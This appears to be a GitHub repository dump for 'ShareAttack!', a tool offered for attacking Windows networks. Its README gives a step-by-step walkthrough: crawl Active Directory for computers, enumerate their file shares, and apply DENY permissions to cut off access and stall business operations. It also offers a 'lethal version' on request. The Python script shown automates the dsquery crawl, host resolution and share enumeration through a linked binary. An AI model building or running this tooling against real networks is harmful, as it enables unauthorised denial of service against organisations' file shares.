├── LICENSE ├── README.md ├── ShareLocator.exe └── shareAttack!.py /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2017 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## Disclaimer 2 | I take not responsibility for your use of the software. Development is done in my personal capacity and carry no affiliation to my work. 3 | 4 | # ShareAttack! 5 | *Crawl any windows network with Active Directory for computers and subsequently launch an attack on weak file permissions.* 6 | 7 | __Usage__: Run ShareAttack!.py, ensure DSQUERY and SHARELOCATOR are included in the same root folder. 8 | 9 | __Synops:__ This attack exploits weak file permissions allowing users to overwrite file permissions assigned to file shares. 10 | Instead of exploiting file shares to gain access, the attack focuses on DENYING access to file shares. The attack uses the exploited account's credentials, (administrator account will be much more powerful). 11 | 12 | __Files:__ 13 | * ShareAttack!.py (_main file to launch attack_) 14 | * dsquery.exe (_standard DSQUERY to extract AD computers_) https://technet.microsoft.com/en-us/library/cc732952(v=ws.11).aspx 15 | * sharelocator.exe (_Extract file shares from target server using srvsvc.NetShareEnumAll MSRPC function and then apply deny permissions (C++ please request source)_) 16 | 17 | __Walkthrough:__ 18 | 1. Load files onto target. 19 | 2. Execute ShareAttack!.py 20 | 3. Will automatically execute dsquery command to extract domain computers. 21 | 4. Test computers and retain active hosts. 22 | 5. Pass active computers onto ShareLocator. 23 | 6. ShareLocator will find all fileshares on target. 24 | 7. Attempt to apply DENY permission for each user with access. 25 | 26 | __Requirements:__ 27 | * Windows computer environment, with AD for dsquery. 28 | * Python 3.6 feel free to port, reference GIT please. 29 | * Weak file permissions :P 30 | 31 | __Version:__ 0.1 32 | 33 | __Parameters:__ *$crawl_limit*: set amount of computers to extract from AD, 0 extracts all. 34 | 35 | __Alternatives [future to-do]:__ 36 | * ShareAttack!.py not required, can use only sharelocator.exe ```Sharelocator ``` 37 | * Replace DSQUERY with IP range or provide option to user at startup 38 | * Port .py to Windows 39 | 40 | __Note that non lethal version is uploaded, please msg to request lethal version__ 41 | 42 | -------------------------------------------------------------------------------- /ShareLocator.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/InitRoot/shareAttack/098785e786b1966d3af5f1f57741f75e676b9d9c/ShareLocator.exe -------------------------------------------------------------------------------- /shareAttack!.py: -------------------------------------------------------------------------------- 1 | ##Created by FransHBotes 2 | ##Usage: 3 | ##Synops: Use the attack for diversion, test response of security systems. 4 | ## Several companies still make use of file drops and pickups to transfer data, when 5 | ## access to the specified location is denied, business operations can be stalled. 6 | ## Without knowing the network by heart this offers an easy attack method. 7 | ##Version: 0.1 8 | ##Parameters: $crawl_limit: set amount of computers to extract from AD, 0 extracts all. 9 | ## Be prepared to wait when extracting all computers. 10 | ## 11 | ## 12 | ##IMPORTS## 13 | import subprocess 14 | import sys 15 | import socket 16 | import time 17 | import signal 18 | from timeit import default_timer as timer 19 | 20 | 21 | ##PARAMETERS## 22 | crawl_limit = "15000" 23 | ds_query = "dsquery * -filter (objectclass=computer) -attr dNSHostName -limit " + crawl_limit 24 | domain_comps = [] 25 | active_comps = [] 26 | file_shares = {} 27 | host_name = '' 28 | port = 80 29 | pingpassed = 0 30 | pingfailed = 0 31 | maxCount = 20 32 | 33 | def main_function(): 34 | ##INITIATE PROGRAM## 35 | try: 36 | print("ShareAttack! Launched") 37 | print("Gathering AD information....") 38 | signal.signal(signal.SIGINT, signal_handler) 39 | ##CRAWL ACTIVE DIRECTORY FOR ALL COMPUTERS## 40 | domain_comps = subprocess.check_output(ds_query,universal_newlines=True).splitlines() 41 | ##ONLY KEEP LIVE COMPUTERS## 42 | for comp in range(1, len(domain_comps)): 43 | host_name = domain_comps[comp] 44 | ping_host(host_name) 45 | print ("Active computers found!") 46 | print(active_comps) 47 | 48 | ##USE CUSTOM MADE SHARELOCATOR TO LOCATE THE FILESHARES FOR ALL THE COMPUTERS## 49 | print(".........") 50 | print("Launching ShareLocator") 51 | for acomp in range(0, len(active_comps)): 52 | activecomp = active_comps[acomp] 53 | print("ShareLocator " + activecomp) 54 | ShareLocator = "ShareLocator " + activecomp 55 | file_shares[activecomp] = subprocess.check_output(ShareLocator,universal_newlines=True).split(',') 56 | 57 | print("Shares Found!") 58 | print(file_shares) 59 | 60 | except subprocess.CalledProcessError: 61 | pass 62 | 63 | #**********************************************************************# 64 | def signal_handler(signal, frame): 65 | """ Catch Ctrl-C and Exit """ 66 | sys.exit(0) 67 | 68 | 69 | def ping_host(hostname): 70 | count = 0 71 | try: 72 | current_IP = socket.gethostbyname(hostname.strip()) 73 | if current_IP != '': 74 | active_comps.append(current_IP) 75 | 76 | except socket.gaierror: 77 | pass 78 | 79 | #**********************************************************************# 80 | if __name__ == '__main__': 81 | main_function() 82 | --------------------------------------------------------------------------------